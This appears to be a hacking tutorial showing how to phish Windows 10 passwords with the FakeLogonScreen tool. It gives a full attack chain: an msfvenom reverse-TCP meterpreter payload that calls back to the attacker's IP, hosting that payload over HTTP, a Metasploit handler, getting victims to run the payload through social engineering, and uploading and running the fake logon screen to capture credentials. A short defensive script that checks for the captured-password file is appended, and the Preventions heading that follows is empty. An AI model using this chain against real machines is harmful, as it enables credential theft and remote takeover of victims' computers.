This article is an in-depth guide on how to hack Windows 10 passwords using FakeLogonScreen. Hacking Windows 10 passwords is an exciting topic that many people in the group ask about, so I decided to write this Windows hacking tutorial.
I will use FakeLogonScreen and Kali Linux to hack Windows 10 passwords. FakeLogonScreen is a handy and stealthy tool that creates a fake logon screen on a target machine running Windows 10. The tool forces the target user to enter the correct credentials and, once it has them, passes them to the attacker over the backdoor.
Arris Huijgen developed this tool. It takes advantage of normal Windows behavior: the system displays the logon screen when it comes out of sleep mode and asks for credentials. The tool imitates that screen to phish Windows credentials from the target, and its strength is that it only accepts valid credentials.
Now let’s try this tool and perform the exploit. We need to deploy two virtual machines, i.e. Kali Linux and Windows 10. In my virtual lab environment, Kali (the attacking machine) has the IP 192.168.0.103, and Windows (the target machine) has 192.168.0.100.
First, we need to download the FakeLogonScreen executable to our attacking machine from the link:
https://github.com/bitsadmin/fakelogonscreen/releases
Now assume the target machine is connected to the same network as the attacking machine.
We will create a malicious payload with the msfvenom tool, based on the information gathered about the target system. We will set lhost to our Kali’s IP, i.e. 192.168.0.103, and set lport to 4444. Since we are interested in exploiting a Windows system, we will generate the payload as an executable file so that it can easily be executed on the target machine. Use the command:
# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f exe >> payload.exe
Here ‘payload.exe’ is the name of the generated payload. After that, we will run a Python one-liner to create an HTTP server that hosts this malicious payload on port 80 of our Kali machine, so that the target machine can download it.
# python -m SimpleHTTPServer 80
With everything set, the most crucial stage is getting the target to download this malicious payload. In real-life scenarios, an attacker can use different social engineering techniques to get the target user to download this malicious file onto their system.
For practical demonstration, we will access our Kali machine’s directory from the Windows machine and download the payload.
The download also shows up in the current logs on our Kali machine.
Let’s get straight back to Kali and launch Metasploit-framework.
Use multi/handler module.
Set the windows/meterpreter/reverse_tcp payload.
Set lhost to our IP, i.e. 192.168.0.103, and lport to 4444.
After configuring it all, just run the exploit, go back to the Windows machine and run the executable, i.e., ‘payload.exe’. This will quickly get us a meterpreter session.
Now upload the FakeLogonScreen executable that we downloaded earlier. Make sure to give it the correct path of the exe file.
>upload /root/Downloads/FakeLogonScreen.exe
After that, get shell access and run FakeLogonScreen.exe as shown below:
And BOOM!! On the target machine, all the running windows get closed and the logon screen pops up, asking for credentials and appearing to be a legitimate window. The user would not hesitate for a second to enter his credentials and get back to his work.
To check the strength of this tool, we will enter the wrong password.
This shows the error “The password is incorrect, try again.” This is the strength of the FakeLogonScreen tool: it forces the target to enter his correct password. The user has no choice other than to enter his password.
Let’s enter the correct password, and you will get your standard window back as if nothing had happened.
This also shows that FakeLogonScreen works similarly to a keylogger. The attacker can easily monitor all the logs and grab the correct password of the target user.
This tool also works effectively on multiple desktop systems. When it is run on various desktops, all the affected screens turn black immediately after the exploit is executed from the attacking machine. This works even if the target user has set a customized background.
The zip file of the exploit also includes another executable named “FakeLogonScreenToFile.exe” that works the same as the previous executable but has an extra feature: it not only shows the password but also stores it in the file %LOCALAPPDATA%\Microsoft\user.db.
This tool can also be integrated with Cobalt Strike to work effectively.
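The user.db file that FakeLogonScreenToFile.exe writes is a fixed on-disk artifact a defender can hunt for. The following triage check is an added example, not part of the original article or of the FakeLogonScreen project; the function name, the profiles_root parameter and the layout of the findings are assumptions of this example.

```python
import os
from datetime import datetime, timezone
from pathlib import Path

# Relative location of the file named in the article:
# %LOCALAPPDATA%\Microsoft\user.db  ->  <profile>\AppData\Local\Microsoft\user.db
ARTIFACT = Path("AppData") / "Local" / "Microsoft" / "user.db"


def find_credential_dumps(profiles_root):
    """Return one finding per user profile under profiles_root that holds the artifact.

    profiles_root is an assumption of this example: C:\\Users on a live host,
    or the Users directory of a mounted disk image during triage.
    """
    findings = []
    root = Path(profiles_root)
    for profile in sorted(p for p in root.iterdir() if p.is_dir()):
        candidate = profile / ARTIFACT
        try:
            if not candidate.is_file():
                continue
            info = candidate.stat()
        except OSError as exc:
            # Unreadable profile (permissions, broken junction): report it, never skip silently.
            findings.append({"profile": profile.name, "path": str(candidate),
                             "error": exc.strerror or str(exc)})
            continue
        findings.append({
            "profile": profile.name,
            "path": str(candidate),
            "size": info.st_size,
            # Last write time approximates when a password was last captured.
            "modified_utc": datetime.fromtimestamp(info.st_mtime, timezone.utc).isoformat(),
        })
    return findings


if __name__ == "__main__":
    # Live-host default; pass another root when working on a mounted image.
    default_root = os.path.join(os.environ.get("SystemDrive", "C:") + os.sep, "Users")
    if os.path.isdir(default_root):
        for hit in find_credential_dumps(default_root):
            print(hit)
```

A hit means that account's password should be treated as exposed and reset, and the file should be preserved as evidence before it is removed.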
Preventions
Industrial Cybersecurity
September 28, 2023